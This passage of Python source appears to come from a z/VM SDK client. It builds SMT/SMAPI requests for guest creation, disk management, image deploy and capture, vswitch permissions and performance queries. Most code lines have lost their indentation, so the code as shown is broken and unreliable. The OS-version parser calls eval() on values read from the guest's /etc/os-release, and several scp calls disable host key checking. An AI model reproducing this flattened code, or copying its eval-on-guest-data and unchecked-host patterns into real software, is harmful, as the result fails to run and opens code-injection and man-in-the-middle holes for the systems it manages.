        # when using dasd as the root disk, disk_list[0] would be the
        # boot disk.
# when boot from volume, ipl_from should be specified explicitly.
if (disk_list and 'is_boot_disk' in disk_list[0] and
disk_list[0]['is_boot_disk']) or ipl_from:
            # we assume at least one disk exists, which means is_boot_disk
            # is true for exactly one disk.
rd += (' --ipl %s' % self._get_ipl_param(ipl_from))
# load param for ipl
if ipl_param:
rd += ' --iplParam %s' % ipl_param
if ipl_loadparam:
rd += ' --iplLoadparam %s' % ipl_loadparam
if dedicate_vdevs:
rd += ' --dedicate "%s"' % " ".join(dedicate_vdevs)
if loaddev:
if 'portname' in loaddev:
rd += ' --loadportname %s' % loaddev['portname']
if 'lun' in loaddev:
rd += ' --loadlun %s' % loaddev['lun']
action = "create userid '%s'" % userid
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 436) and (err.results['rs'] == 4)):
result = "Profile '%s'" % profile
raise exception.SDKObjectNotExistError(obj_desc=result,
modID='guest')
else:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
# Add the guest to db immediately after user created
action = "add guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.add_guest(userid)
# Continue to add disk
if disk_list:
# Add disks for vm
return self.add_mdisks(userid, disk_list)
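    # A minimal sketch of the directory request built by create_vm, using
    # hypothetical arguments (userid='TESTID', cpu=2, memory=2048,
    # profile='OSDFLT', max_cpu=4, max_mem='4G'):
    # 'makevm TESTID directory LBYONLY 2048m <default privilege> --cpus 2 '
    # '--profile OSDFLT --maxCPU 4 --maxMemSize 4G --setReservedMem'
    # with '--logonby', '--ipl', '--dedicate' and the load device options
    # appended only when the corresponding inputs are supplied.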
def _add_mdisk(self, userid, disk, vdev):
"""Create one disk for userid
NOTE: No read, write and multi password specified, and
        access mode defaults to 'MR'.
"""
size = disk['size']
fmt = disk.get('format', 'ext4')
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
action = 'add3390'
else:
action = 'add9336'
rd = ' '.join(['changevm', userid, action, diskpool_name,
vdev, size, '--mode MR'])
if fmt and fmt != 'none':
rd += (' --filesystem %s' % fmt.lower())
action = "add mdisk to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
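    # Illustrative example (hypothetical values): for disk
    # {'size': '5g', 'format': 'ext4', 'disk_pool': 'ECKD:POOL1'} and
    # vdev '0100', the request built above is
    # 'changevm TESTID add3390 POOL1 0100 5g --mode MR --filesystem ext4'.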
def get_vm_list(self):
"""Get the list of guests that are created by SDK
return userid list"""
action = "list all guests in database"
with zvmutils.log_and_reraise_sdkbase_error(action):
guests_in_db = self._GuestDbOperator.get_guest_list()
guests_migrated = \
self._GuestDbOperator.get_migrated_guest_info_list()
# db query return value in tuple (uuid, userid, metadata, comments)
userids_in_db = [g[1].upper() for g in guests_in_db]
userids_migrated = [g[1].upper() for g in guests_migrated]
userid_list = list(set(userids_in_db) - set(userids_migrated))
return userid_list
def _remove_mdisk(self, userid, vdev):
rd = ' '.join(('changevm', userid, 'removedisk', vdev))
action = "remove disk with vdev '%s' from userid '%s'" % (vdev, userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def guest_authorize_iucv_client(self, userid, client=None):
"""Punch a script that used to set the authorized client userid in vm
If the guest is in log off status, the change will take effect when
the guest start up at first time.
If the guest is in active status, power off and power on are needed
for the change to take effect.
:param str guest: the user id of the vm
:param str client: the user id of the client that can communicate to
guest using IUCV"""
client = client or zvmutils.get_smt_userid()
iucv_path = "/tmp/" + userid
if not os.path.exists(iucv_path):
os.makedirs(iucv_path)
iucv_auth_file = iucv_path + "/iucvauth.sh"
zvmutils.generate_iucv_authfile(iucv_auth_file, client)
try:
requestData = "ChangeVM " + userid + " punchfile " + \
iucv_auth_file + " --class x"
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
msg = ("Failed to punch IUCV auth file to userid '%s'. SMT error:"
" %s" % (userid, err.format_message()))
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
finally:
self._pathutils.clean_temp_folder(iucv_path)
def volume_refresh_bootmap(self, fcpchannels, wwpns, lun, skipzipl=False):
""" Refresh bootmap info of specific volume.
: param fcpchannels: list of fcpchannels.
: param wwpns: list of wwpns.
: param lun: string of lun.
: return value: list of FCP devices and physical wwpns.
"""
fcps = ','.join(fcpchannels)
ws = ','.join(wwpns)
fcs = "--fcpchannel=%s" % fcps
wwpns = "--wwpn=%s" % ws
lun = "--lun=%s" % lun
if skipzipl:
skipzipl = "--skipzipl=YES"
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns, lun,
skipzipl]
else:
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns, lun]
LOG.info("Running command: %s", cmd)
with zvmutils.expect_and_reraise_internal_error(
modID='refresh_bootmap'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("refresh_bootmap failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKVolumeOperationError(rs=5,
errcode=rc,
errmsg=err_output)
output_lines = output.split('\n')
res_wwpns = []
res_fcps = []
for line in output_lines:
if line.__contains__("WWPNs: "):
wwpns = line[7:]
# Convert string to list by space
res_wwpns = wwpns.split()
if line.__contains__("FCPs: "):
fcps = line[6:]
# Convert string to list by space
res_fcps = fcps.split()
return res_wwpns, res_fcps
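    # Sketch of the refresh_bootmap invocation and output parsing above,
    # with hypothetical values: the command run is roughly
    #   sudo /opt/zthin/bin/refresh_bootmap --fcpchannel=1a00,1b00 \
    #        --wwpn=500507680b21fac0 --lun=0000000000000000 [--skipzipl=YES]
    # and the output lines starting with 'WWPNs: ' and 'FCPs: ' are split on
    # whitespace to build the two returned lists.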
def guest_deploy(self, userid, image_name, transportfiles=None,
remotehost=None, vdev=None, skipdiskcopy=False):
""" Deploy image and punch config driver to target """
        # (TODO: add support for multiple-disk deploy)
if skipdiskcopy:
            msg = ('Start guest_deploy without unpackdiskimage, guest: %(vm)s, '
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
cmd = ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
# Purge guest reader to clean dirty data
rd = ("changevm %s purgerdr" % userid)
action = "purge reader of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
# Punch transport files if specified
if transportfiles:
# Copy transport file to local
msg = ('Start to send customized file to vm %s' % userid)
LOG.info(msg)
try:
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
if remotehost:
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
else:
cmd = ["/usr/bin/cp", transportfiles, local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy config drive with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
# Punch config drive to guest userid
rd = ("changevm %(uid)s punchfile %(file)s --class X" %
{'uid': userid, 'file': local_trans})
action = "punch config drive to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
finally:
# remove the local temp config drive folder
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Authorize iucv client
self.guest_authorize_iucv_client(userid)
# Update os version in guest metadata
        # TODO: may need to append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
image_info = self._ImageDbOperator.image_query_record(image_name)
os_version = image_info[0]['imageosdistro']
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without unpackdiskimage finish successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_deploy_rhcos(self, userid, image_name, transportfiles,
remotehost=None, vdev=None, hostname=None,
skipdiskcopy=False):
""" Deploy image"""
        # (TODO: add support for multiple-disk deploy)
if transportfiles is None:
err_msg = 'Ignition file is required when deploying RHCOS image'
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=13, userid=userid)
if skipdiskcopy:
            msg = ('Start guest_deploy without copy disk, guest: %(vm)s, '
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = None
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
tmp_trans_dir = None
try:
if remotehost:
                # download ignition file from remote host
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy ignition file with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
transportfiles = local_trans
cmd = self._get_unpackdiskimage_cmd_rhcos(userid, image_name,
transportfiles, vdev,
image_file, hostname,
skipdiskcopy)
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
finally:
# remove the temp ignition file
if tmp_trans_dir:
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Update os version in guest metadata
        # TODO: may need to append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
os_version = self.image_get_os_distro(image_name)
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without copy disk finish successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_capture(self, userid, image_name, capture_type='rootonly',
compress_level=6):
if capture_type == "alldisks":
func = ('Capture guest with type: %s' % capture_type)
msg = ('%s is not supported in current release' % func)
LOG.error(msg)
raise exception.SDKFunctionNotImplementError(func=func,
modID='guest')
msg = ('Start to capture %(vm)s to generate image %(img)s with '
'capture type %(type)s' % {'vm': userid,
'img': image_name,
'type': capture_type})
LOG.info(msg)
self._check_power_state(userid, 'capture')
# Make sure the iucv channel is ready for communication on source vm
try:
self.execute_cmd(userid, 'pwd')
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to check iucv status on capture source vm '
'%(vm)s with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# Get the os version of the vm
try:
os_version = self._guest_get_os_version(userid)
except exception.SDKSMTRequestFailed as err:
            msg = ('Failed to execute command on capture source vm %(vm)s '
'to get os version with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
except Exception as err:
msg = ('Error happened when parsing os version on source vm '
'%(vm)s with error: %(err)s' % {'vm': userid,
'err': six.text_type(err)})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
msg = ('The os version of capture source vm %(vm)s is %(version)s' %
{'vm': userid,
'version': os_version})
LOG.info(msg)
# Find the root device according to the capture type
try:
capture_devices = self._get_capture_devices(userid, capture_type)
except exception.SDKSMTRequestFailed as err:
msg = ('Failed to execute command on source vm %(vm)s to get the '
'devices for capture with error %(err)s' % {'vm': userid,
'err': err.results['response'][0]})
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
        except exception.SDKGuestOperationError:
            # re-raise before the generic handler below so it is not
            # swallowed and re-wrapped
            raise
        except Exception as err:
            msg = ('Internal error happened when getting the devices for '
                   'capture on source vm %(vm)s with error %(err)s' %
                   {'vm': userid,
                    'err': six.text_type(err)})
            LOG.error(msg)
            raise exception.SDKGuestOperationError(rs=5, userid=userid,
                                                   msg=msg)
# Shutdown the vm before capture
self.guest_softstop(userid)
# Prepare directory for writing image file
image_temp_dir = '/'.join((CONF.image.sdk_image_repository,
const.IMAGE_TYPE['CAPTURE'],
os_version,
image_name))
self._pathutils.mkdir_if_not_exist(image_temp_dir)
# Call creatediskimage to capture a vm to generate an image
# TODO:(nafei) to support multiple disk capture
vdev = capture_devices[0]
msg = ('Found the device %(vdev)s of %(vm)s for capture' %
{'vdev': vdev, 'vm': userid})
LOG.info(msg)
image_file_name = vdev
image_file_path = '/'.join((image_temp_dir, image_file_name))
cmd = ['sudo', '/opt/zthin/bin/creatediskimage', userid, vdev,
image_file_path, '--compression', str(compress_level)]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("creatediskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
self._pathutils.clean_temp_folder(image_temp_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=err_output)
# Move the generated image to netboot folder
image_final_dir = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
os_version,
image_name])
image_final_path = '/'.join((image_final_dir,
image_file_name))
self._pathutils.mkdir_if_not_exist(image_final_dir)
cmd = ['mv', image_file_path, image_final_path]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("move image file from staging to netboot "
"folder failed with return code: %d." % rc)
LOG.error(err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
self._pathutils.clean_temp_folder(image_final_dir)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
err=err_msg)
self._pathutils.clean_temp_folder(image_temp_dir)
msg = ('Updating the metadata for captured image %s ' % image_name)
LOG.info(msg)
# Get md5sum of image
real_md5sum = self._get_md5sum(image_final_path)
# Get disk_size_units of image
disk_size_units = self._get_disk_size_units(image_final_path)
# Get the image physical size
image_size = self._get_image_size(image_final_path)
# Create the image record in image database
self._ImageDbOperator.image_add_record(image_name, os_version,
real_md5sum, disk_size_units, image_size,
capture_type)
LOG.info('Image %s is captured and imported to image repository '
'successfully' % image_name)
def _guest_get_os_version(self, userid):
os_version = ''
release_file = self.execute_cmd(userid, 'ls /etc/*-release')
if '/etc/os-release' in release_file:
# Parse os-release file, part of the output looks like:
# NAME="Red Hat Enterprise Linux Server"
# ID="rhel"
# VERSION_ID="7.0"
release_info = self.execute_cmd(userid, 'cat /etc/os-release')
release_dict = {}
for item in release_info:
if item:
release_dict[item.split('=')[0]] = item.split('=')[1]
distro = release_dict['ID']
version = release_dict['VERSION_ID']
if '"' in distro:
distro = eval(distro)
if '"' in version:
version = eval(version)
os_version = '%s%s' % (distro, version)
return os_version
elif '/etc/redhat-release' in release_file:
# The output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/redhat-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
elif '/etc/SuSE-release' in release_file:
# The output for this file looks like:
# SUSE Linux Enterprise Server 11 (s390x)
# VERSION = 11
# PATCHLEVEL = 3
distro = 'sles'
release_info = self.execute_cmd(userid, 'cat /etc/SuSE-release')
LOG.debug('OS release info is %s' % release_info)
release_version = '.'.join((release_info[1].split('=')[1].strip(),
release_info[2].split('=')[1].strip()))
os_version = ''.join((distro, release_version))
return os_version
elif '/etc/system-release' in release_file:
            # Some rhel6.7 systems only have the system-release file and
            # the output looks like:
# "Red Hat Enterprise Linux Server release 6.7 (Santiago)"
distro = 'rhel'
release_info = self.execute_cmd(userid, 'cat /etc/system-release')
distro_version = release_info[0].split()[6]
os_version = ''.join((distro, distro_version))
return os_version
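    # Examples of the os_version strings produced above, based on the sample
    # file contents shown in the comments: ID="rhel" with VERSION_ID="7.0"
    # yields 'rhel7.0'; a SuSE-release with VERSION = 11 and PATCHLEVEL = 3
    # yields 'sles11.3'; a redhat-release line for release 6.7 yields
    # 'rhel6.7'.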
def _get_capture_devices(self, userid, capture_type='rootonly'):
capture_devices = []
if capture_type == 'rootonly':
# Parse the /proc/cmdline to get root devices
proc_cmdline = self.execute_cmd(userid, 'cat /proc/cmdline '
'| tr " " "\\n" | grep -a "^root=" | cut -c6-')
root_device_info = proc_cmdline[0]
if not root_device_info:
msg = ('Unable to get useful info from /proc/cmdline to '
'locate the device associated with the root directory '
'on capture source vm %s' % userid)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
if 'UUID=' in root_device_info:
uuid = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-uuid', uuid))
elif 'LABEL=' in root_device_info:
label = root_device_info.split()[0].split('=')[1]
root_device = '/'.join(('/dev/disk/by-label', label))
elif 'mapper' in root_device_info:
msg = ('Capturing a disk with root filesystem on logical'
' volume is not supported')
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
else:
root_device = root_device_info
root_device_node = self.execute_cmd(userid, 'readlink -f %s' %
root_device)[0]
# Get device node vdev by node name
cmd = ('cat /proc/dasd/devices | grep -i "is %s" ' %
root_device_node.split('/')[-1].rstrip(string.digits))
result = self.execute_cmd(userid, cmd)[0]
root_device_vdev = result.split()[0][4:8]
capture_devices.append(root_device_vdev)
return capture_devices
else:
# For sysclone, parse the user directory entry to get the devices
# for capture, leave for future
pass
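    # A rough walk-through of the 'rootonly' path above, with hypothetical
    # values: a /proc/cmdline containing 'root=UUID=1234-ab' is resolved to
    # /dev/disk/by-uuid/1234-ab, readlink maps it to a node such as
    # /dev/dasda1, the trailing digits are stripped to get 'dasda', and the
    # matching line in /proc/dasd/devices is used to pick out the vdev
    # (characters 4..7 of its first field) that will be captured.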
def _get_unpackdiskimage_cmd_rhcos(self, userid, image_name,
transportfiles=None, vdev=None,
image_file=None, hostname=None,
skipdiskcopy=False):
if skipdiskcopy:
os_version = image_name
image_disk_type = 'SCSI'
else:
os_version = self.image_get_os_distro(image_name)
# Query image disk type
image_disk_type = self._get_image_disk_type(image_name)
if image_disk_type is None:
err_msg = ("failed to get image disk type for "
"image '%(image_name)s'."
% {'image_name': image_name})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
try:
# Query vm's disk pool type and image disk type
from zvmsdk import dist
_dist_manager = dist.LinuxDistManager()
linuxdist = _dist_manager.get_linux_dist(os_version)()
            # Read coreos fixed ip parameter from tempfile
fixed_ip_parameter = linuxdist.read_coreos_parameter(userid)
except Exception as err:
err_msg = ("failed to read coreos fixed ip "
"parameters for userid '%(userid)s',"
"error: %(err)s."
% {'userid': userid, 'err': err})
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if fixed_ip_parameter is None:
err_msg = ("coreos fixed ip parameters don't exist.")
raise exception.SDKGuestOperationError(rs=12, userid=userid,
err=err_msg)
if hostname:
            # replace the userid in the parameter with the display hostname
fixed_ip_parameter = fixed_ip_parameter.replace(userid.upper(),
hostname)
# read nic device id and change it into the form like
# "0.0.1000,0.0.1001,0.0.1002"
nic_id = self._generate_increasing_nic_id(
fixed_ip_parameter.split(":")[5].replace("enc", ""))
if image_disk_type == 'SCSI':
(wwpn, lun) = self._get_wwpn_lun(userid)
if wwpn is None or lun is None:
err_msg = ("wwpn and lun is required for FCP devices,"
" please set LOADDEV for userid %s" % userid)
raise exception.SDKGuestOperationError(rs=14, userid=userid,
msg=err_msg)
wwpn = '0x' + wwpn
lun = '0x' + lun
if skipdiskcopy:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, transportfiles, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', vdev,
wwpn, lun, image_file, transportfiles,
image_disk_type, nic_id, fixed_ip_parameter]
else:
return ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file, transportfiles, image_disk_type, nic_id,
fixed_ip_parameter]
def grant_user_to_vswitch(self, vswitch_name, userid):
"""Set vswitch to grant user."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k grant_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to grant user %s to vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def _set_vswitch_exception(self, error, switch_name):
if ((error.results['rc'] == 212) and (error.results['rs'] == 40)):
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
elif ((error.results['rc'] == 396) and (error.results['rs'] == 2846)):
errmsg = ("Operation is not allowed for a "
"VLAN UNAWARE vswitch")
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
elif ((error.results['rc'] == 396) and
((error.results['rs'] == 2838) or
(error.results['rs'] == 2853) or
(error.results['rs'] == 2856) or
(error.results['rs'] == 2858) or
(error.results['rs'] == 3022) or
(error.results['rs'] == 3033))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=5,
vsw=switch_name,
msg=errmsg)
else:
raise error
def revoke_user_from_vswitch(self, vswitch_name, userid):
"""Revoke user for vswitch."""
smt_userid = zvmutils.get_smt_userid()
requestData = ' '.join((
'SMAPI %s API Virtual_Network_Vswitch_Set_Extended' % smt_userid,
"--operands",
"-k switch_name=%s" % vswitch_name,
"-k revoke_userid=%s" % userid,
"-k persist=YES"))
try:
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to revoke user %s from vswitch %s, error: %s"
% (userid, vswitch_name, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
def image_performance_query(self, uid_list):
"""Call Image_Performance_Query to get guest current status.
:uid_list: A list of zvm userids to be queried
"""
if uid_list == []:
return {}
if not isinstance(uid_list, list):
uid_list = [uid_list]
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Image_Performance_Query" % smt_userid,
"--operands",
'-T "%s"' % (' '.join(uid_list)),
"-c %d" % len(uid_list)))
action = "get performance info of userid '%s'" % str(uid_list)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# when there is only one userid queried and this userid is
                # in 'off' state, smcli only returns the queried
                # userid number and no valid performance info is returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
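    # Illustrative shape of the returned dictionary (hypothetical values):
    # {'TESTID': {'userid': 'TESTID', 'guest_cpus': '2',
    #             'used_memory': '512871 KB', 'max_memory': '2097152 KB',
    #             ...}}
    # with one entry per userid that had valid performance data in the
    # SMAPI response.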
def system_image_performance_query(self, namelist):
"""Call System_Image_Performance_Query to get guest current status.
:namelist: A namelist that defined in smapi namelist file.
"""
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API System_Image_Performance_Query" % smt_userid,
"--operands -T %s" % namelist))
action = "get performance info of namelist '%s'" % namelist
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ipq_kws = {
'userid': "Guest name:",
'guest_cpus': "Guest CPUs:",
'used_cpu_time': "Used CPU time:",
'elapsed_cpu_time': "Elapsed time:",
'min_cpu_count': "Minimum CPU count:",
'max_cpu_limit': "Max CPU limit:",
'samples_cpu_in_use': "Samples CPU in use:",
'samples_cpu_delay': "Samples CPU delay:",
'used_memory': "Used memory:",
'max_memory': "Max memory:",
'min_memory': "Minimum memory:",
'shared_memory': "Shared memory:",
}
pi_dict = {}
pi = {}
rpi_list = ('\n'.join(results['response'])).split("\n\n")
for rpi in rpi_list:
try:
pi = zvmutils.translate_response_to_dict(rpi, ipq_kws)
except exception.SDKInternalError as err:
emsg = err.format_message()
# when there is only one userid queried and this userid is
                # in 'off' state, smcli only returns the queried
                # userid number and no valid performance info is returned.
if(emsg.__contains__("No value matched with keywords.")):
continue
else:
raise err
for k, v in pi.items():
pi[k] = v.strip('" ')
if pi.get('userid') is not None:
pi_dict[pi['userid']] = pi
return pi_dict
def virtual_network_vswitch_query_byte_stats(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Byte_Stats" %
smt_userid,
"--operands",
'-T "%s"' % smt_userid,
'-k "switch_name=*"'
))
action = "query vswitch usage info"
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return self._parse_vswitch_inspect_data(results['response'])
def get_host_info(self):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost general")
host_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.RINV_HOST_KEYWORDS)
return host_info
def get_diskpool_info(self, pool):
with zvmutils.log_and_reraise_smt_request_failed():
results = self._request("getHost diskpoolspace %s" % pool)
dp_info = zvmutils.translate_response_to_dict(
'\n'.join(results['response']), const.DISKPOOL_KEYWORDS)
return dp_info
def get_vswitch_list(self):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query" % smt_userid,
"--operands",
"-s \'*\'"))
try:
result = self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
LOG.warning("No Virtual switch in the host")
return []
else:
LOG.error("Failed to get vswitch list, error: %s" %
err.format_message())
raise
with zvmutils.expect_invalid_resp_data():
if (not result['response'] or not result['response'][0]):
return []
else:
data = '\n'.join([s for s in result['response']
if isinstance(s, six.string_types)])
output = re.findall('VSWITCH: Name: (.*)', data)
return output
def set_vswitch_port_vlan_id(self, vswitch_name, userid, vlan_id):
smt_userid = zvmutils.get_smt_userid()
msg = ('Start to set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Set_Extended" %
smt_userid,
"--operands",
"-k grant_userid=%s" % userid,
"-k switch_name=%s" % vswitch_name,
"-k user_vlan_id=%s" % vlan_id,
"-k persist=YES"))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to set VLAN ID %s on vswitch %s for user %s, "
"error: %s" %
(vlan_id, vswitch_name, userid, err.format_message()))
self._set_vswitch_exception(err, vswitch_name)
msg = ('Set VLAN ID %(vid)s on vswitch %(vsw)s '
'for guest %(vm)s successfully'
% {'vid': vlan_id, 'vsw': vswitch_name, 'vm': userid})
LOG.info(msg)
def add_vswitch(self, name, rdev=None, controller='*',
connection='CONNECT', network_type='ETHERNET',
router="NONROUTER", vid='UNAWARE', port_type='ACCESS',
